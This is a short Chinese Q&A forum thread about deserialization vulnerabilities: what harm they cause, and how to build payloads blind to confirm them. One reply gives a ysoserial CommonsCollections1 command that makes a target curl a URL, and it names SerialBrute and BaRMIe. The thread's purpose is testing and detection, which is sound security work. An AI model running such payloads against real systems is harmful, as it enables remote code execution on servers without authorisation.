反序列化漏洞有什么危害?能植入木马吗?能运行命令吗?
不看代码的情况下,能构造payload吗?
您好!
1、您可以查一下CERT省级支撑单位和CNNVD技术支持单位,这些安全厂商有监测响应模块的产品都能防范反序列化漏洞
2、至于产品自带的沙箱是否能检测出来,要看产品的漏洞规则库是否带上了,需要实际环境去查看
3、反序列化漏洞危害:特定条件下可绕过默认autoType关闭限制,攻击远程服务器,将可能导致远程代码执行
4、远程服务器被攻破,远程到目标主机上植入木马、运行命令、构造payload都是随便操作了
专业的黑盒检测应该可以
调用ysoserial并依次生成各个第三方库的利用payload(也可以先分析依赖第三方包量,调用最多的几个库的paylaod即可),该payload构造为访问特定url链接的payload,根据http访问请求记录判断反序列化漏洞是否利用成功。如:
java -jar ysoserial.jar CommonsCollections1 'curl " + URL + " '
也可通过DNS解析记录确定漏洞是否存在。现成的轮子很多,推荐NickstaDB写的SerialBrute,还有一个针对RMI的测试工具BaRMIe,也很不错~。.